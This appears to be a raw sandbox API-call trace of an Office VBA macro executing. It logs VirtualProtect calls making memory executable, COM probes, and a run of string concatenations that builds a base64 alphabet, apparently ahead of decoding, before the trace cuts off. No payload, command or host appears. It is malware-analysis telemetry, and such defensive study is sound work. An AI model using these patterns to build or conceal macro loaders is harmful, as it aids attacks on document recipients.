ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc2a0, pDummy=0x0 | out: ppTLibAttr=0x1dc2a0, pDummy=0x0) returned 0x0 [0203.065] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.066] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.066] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc290, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.066] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc290, pbstrName=0x0, pwOrdinal=0x1dc2b0 | out: pBstrDllName=0x1dc290*=0x0, pbstrName=0x0, pwOrdinal=0x1dc2b0*=0xc520) returned 0x0 [0203.066] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc290, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc290, pwOrdinal=0x500000000) returned 0x0 [0203.066] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc2b0, pIndex=0x0 | out: ppTLib=0x1dc2b0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.066] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc2c0, pDummy=0x0 | out: ppTLibAttr=0x1dc2c0, pDummy=0x0) returned 0x0 [0203.066] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.066] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.066] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x1dc2b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.066] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc2b0, pbstrName=0x0, pwOrdinal=0x1dc2d0 | out: pBstrDllName=0x1dc2b0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc2d0*=0xc540) returned 0x0 [0203.066] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc2b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc2b0, pwOrdinal=0x500000000) returned 0x0 [0203.066] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9aa6420, cb=0x5c2) returned 0x78479e0 [0203.066] IMalloc:Free (This=0x7fefecb5380, pv=0x95bce90) [0203.066] GetCurrentProcess () returned 0xffffffffffffffff [0203.066] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0203.066] GetCurrentProcess () returned 0xffffffffffffffff [0203.066] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0203.066] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0203.067] GetCurrentProcess () returned 0xffffffffffffffff [0203.067] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0203.067] GetCurrentProcess () returned 0xffffffffffffffff [0203.067] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55268, dwSize=0x2) returned 1 [0203.067] GetCurrentProcess () returned 0xffffffffffffffff [0203.067] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c552bc, dwSize=0x55) returned 1 [0203.067] VirtualProtect (in: lpAddress=0x9c552bc, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0203.068] GetCurrentProcess () returned 0xffffffffffffffff [0203.068] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0203.068] GetCurrentProcess () returned 0xffffffffffffffff [0203.068] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0203.068] GetCurrentProcess () returned 0xffffffffffffffff [0203.068] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553d0, dwSize=0x2) returned 1 [0203.068] GetCurrentProcess () returned 0xffffffffffffffff [0203.068] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55424, dwSize=0x45) returned 1 [0203.068] VirtualProtect (in: lpAddress=0x9c55424, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0203.069] GetCurrentProcess () returned 0xffffffffffffffff [0203.069] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c554ac, dwSize=0x45) returned 1 [0203.069] VirtualProtect (in: lpAddress=0x9c554ac, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0203.070] GetCurrentProcess () returned 0xffffffffffffffff [0203.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0203.070] GetCurrentProcess () returned 0xffffffffffffffff [0203.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0203.070] GetCurrentProcess () returned 0xffffffffffffffff [0203.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55538, dwSize=0x2) returned 1 [0203.070] GetCurrentProcess () returned 0xffffffffffffffff [0203.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54f30, dwSize=0x5d) returned 1 [0203.070] VirtualProtect (in: lpAddress=0x9c54f30, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0203.072] GetCurrentProcess () returned 0xffffffffffffffff [0203.072] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0203.072] GetCurrentProcess () returned 0xffffffffffffffff [0203.072] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0203.072] GetCurrentProcess () returned 0xffffffffffffffff [0203.072] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fd0, dwSize=0x2) returned 1 [0203.072] GetCurrentProcess () returned 0xffffffffffffffff [0203.072] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55024, dwSize=0x55) returned 1 [0203.072] VirtualProtect (in: lpAddress=0x9c55024, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0203.073] SetErrorMode (uMode=0x8001) returned 0x8001 [0203.073] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0203.073] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0203.074] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000cd3) returned 1 [0203.074] SetErrorMode (uMode=0x8001) returned 0x8001 [0203.075] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x23d) returned 0x7fee4f8afec [0203.075] GetCurrentProcess () returned 0xffffffffffffffff [0203.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e2e5c, dwSize=0x43) returned 1 [0203.075] RtlLookupFunctionEntry (in: ControlPc=0x95e2e5c, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0203.075] VirtualProtect (in: lpAddress=0x95e2e5c, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x40) returned 1 [0203.076] RtlAddFunctionTable (FunctionTable=0x95e2eac, EntryCount=0x1, BaseAddress=0x95e2e00, TargetGp=0x1dc73c) returned 1 [0203.076] SetErrorMode (uMode=0x8001) returned 0x8001 [0203.077] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0203.077] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0203.078] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000cd4) returned 1 [0203.078] SetErrorMode (uMode=0x8001) returned 0x8001 [0203.078] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x25f) returned 0x7fee4f8e020 [0203.078] GetCurrentProcess () returned 0xffffffffffffffff [0203.078] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e2f34, dwSize=0x4b) returned 1 [0203.078] RtlLookupFunctionEntry (in: ControlPc=0x95e2f34, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0203.078] VirtualProtect (in: lpAddress=0x95e2f34, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x40) returned 1 [0203.079] RtlAddFunctionTable (FunctionTable=0x95e2f8c, EntryCount=0x1, BaseAddress=0x95e2f00, TargetGp=0x1dc73c) returned 1 [0203.079] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.079] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.079] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.079] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.079] IUnknown:AddRef (This=0xa02b160) returned 0x6 [0203.079] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.079] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.079] IUnknown:Release (This=0xa02b160) returned 0x5 [0203.079] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0203.080] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa02b058) returned 0x1 [0203.080] IUnknown:AddRef (This=0xa02b420) returned 0x5 [0203.080] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa02b420) returned 0x4 [0203.080] IUnknown:AddRef (This=0xa121118) returned 0x3 [0203.080] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa121118) returned 0x2 [0203.080] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.080] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa121698) returned 0x9 [0203.080] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0203.080] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa02ae48) returned 0x4 [0203.080] IUnknown:AddRef (This=0xa121488) returned 0x4 [0203.080] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa121488) returned 0x3 [0203.080] IUnknown:AddRef (This=0xa1216f0) returned 0x3 [0203.080] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.080] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.080] IUnknown:Release (This=0xa1216f0) returned 0x2 [0203.081] GetAsyncKeyState (vKey=27) returned 0 [0203.081] GetAsyncKeyState (vKey=27) returned 0 [0203.081] GetUserDefaultLCID () returned 0x409 [0203.081] malloc (_Size=0xa0) returned 0x48ab340 [0203.081] realloc (_Block=0x48ab340, _Size=0x140) returned 0x11f50350 [0203.081] realloc (_Block=0x11f50350, _Size=0x1e0) returned 0x11f50350 [0203.081] realloc (_Block=0x11f50350, _Size=0x280) returned 0x11f50350 [0203.083] free (_Block=0x11f50350) [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="41", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="42", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="43", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="44", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="45", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="46", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="47", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="48", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.084] VarBstrCat (in: bstrLeft="&H", bstrRight="49", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="4a", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="4b", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="4c", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="4d", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="4e", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="4f", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="50", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="51", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="52", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="53", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="54", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="55", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="56", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="57", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.085] VarBstrCat (in: bstrLeft="&H", bstrRight="58", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="59", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="5a", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="62", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="63", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="64", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="65", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="66", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="67", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="68", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="69", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="6a", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="6b", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.086] VarBstrCat (in: bstrLeft="&H", bstrRight="6c", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="6d", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="6e", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="6f", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="70", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="71", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="72", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="73", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="74", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="75", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="76", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="77", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="78", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="79", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="7a", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.087] VarBstrCat (in: bstrLeft="&H", bstrRight="30", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="31", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="32", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="33", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="34", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="35", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="36", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="37", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="38", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="39", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="2b", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarBstrCat (in: bstrLeft="&H", bstrRight="2f", pbstrResult=0x1ddd50 | out: pbstrResult=0x1ddd50) returned 0x0 [0203.088] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025e48, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.104] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.104] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.104] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.104] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.104] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.104] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.105] VarSub (in: 